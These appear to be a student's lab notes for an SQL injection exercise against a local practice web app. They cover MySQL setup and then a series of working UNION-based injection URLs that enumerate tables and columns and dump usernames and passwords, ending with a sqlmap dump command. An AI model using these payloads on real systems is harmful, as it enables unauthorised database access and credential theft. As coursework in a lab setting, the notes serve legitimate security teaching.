Week 9: Lab 9.1 SQLi

Prep

• To start we needed to boot up the mysqld service

sudo systemctl enable mysqld 
sudo systemctl start mysqld
sudo mysql_secure_installation

• No password for root just FYI

Switch to unix_socket authentication [Y/n] n
Change the root password? [Y/n] Y
Remove anonymous users? [Y/n] y
Disallow root login remotely? [Y/n] y
Remove test database and access to it? [Y/n] y
Reload privilege tables now? [Y/n] y

• Now edit the db-creds.inc under sql-connections and add the root password

nano sql-connections/db-creds.inc

Lesson 1

• Boot up the server

php -S 127.0.0.1:8090 -t .

• Click Setup/reset Database for labs

---

Deliverable 1

127.0.0.1:8090/Less-1/?id=1

Deliverable 2

127.0.0.1:8090/Less-1/?id=1' order by 4%20--+

Deliverable 3

127.0.0.1:8090/Less-1/?id=-1' union select 1,user(),database()%20--+

Deliverable 4

127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

Deliverable 5

127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+

Deliverable 6

127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

Deliverable 7

sqlmap -u http://127.0.0.1:8090/Less-1/?id=1 -T users --level 2 --risk 2 --dump